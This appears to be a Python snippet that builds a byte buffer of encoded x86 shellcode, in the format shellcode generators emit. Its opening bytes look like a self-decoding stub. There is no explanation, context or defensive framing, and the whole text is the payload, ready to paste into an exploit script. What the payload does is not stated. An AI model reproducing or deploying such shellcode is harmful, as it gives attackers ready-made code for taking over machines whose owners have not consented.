buf =  ""
buf += "\xbf\x41\x3e\xdd\xdd\xda\xc2\xd9\x74\x24\xf4\x58\x33"
buf += "\xc9\xb1\x3e\x31\x78\x14\x03\x78\x14\x83\xc0\x04\xa3"
buf += "\xcb\x67\x21\x77\x40\xe8\x03\xb8\x71\x7c\x90\xb2\xdf"
buf += "\x4e\x11\x8b\xd7\x33\x64\xef\x26\x61\x76\xec\x1d\x98"
buf += "\x9a\xfb\x14\x2d\xf3\x7e\x30\x9e\xf6\xd1\x03\x29\xbc"
buf += "\x12\x88\xdb\xb8\x56\x1f\x1e\x3d\x43\xd5\x36\xc4\x48"
buf += "\xd6\x30\x79\xcf\x7f\xc9\xfc\xe8\xd2\x51\x4e\xa6\x55"
buf += "\xd6\x43\xc4\xe3\xfe\x97\x42\x4a\xbc\x49\x98\xc7\x1d"
buf += "\xb4\x51\xa5\x87\x2e\x5e\xe1\x2e\x3c\xfe\x06\x52\x04"
buf += "\x97\xf8\xf6\x7c\x06\x4c\xd9\xbe\xe1\x76\x09\x10\x74"
buf += "\xbe\x8a\x69\x84\xd2\x2e\x59\x80\x80\xb0\x66\xcb\x4f"
buf += "\x8b\x18\x5a\x69\x1b\x1e\x6d\x53\x20\x84\xbb\x92\xca"
buf += "\xbe\x12\x2d\x0f\x5e\x11\x03\xee\x3b\xfd\x4b\x13\xd7"
buf += "\xc0\xbd\x77\x41\xe3\x68\x84\xe4\x70\x1a\x26\xdb\x83"
buf += "\x51\x10\x36\x7f\x6e\x1a\x8f\x30\x2c\x18\xd5\x83\x1f"
buf += "\xaa\x6f\x4e\x33\xb6\x0e\xa5\x8f\xaf\x03\x01\xa7\x7f"
buf += "\x05\x2e\xea\x8f\xce\x9d\xa3\x70\xb6\xbd\x5b\x7e\x51"
buf += "\xd3\xb5\x9d\x03\xab\x3e\xf9\x91\x12\x23\x6c\x1e\x09"
buf += "\x7d\x09\x41\xd0\x3a\xca\x9b\xee\xf5\x13\xfc\x60\x3d"
buf += "\xc2\xa6\x22\x70\x2a\x10\x15\x48\x48\xf9\x0c\x6e\x8b"
buf += "\x5a\x1b\xeb\x4e\xfa\x09\xd4\x12\xd8\x53\x31\xec\x12"
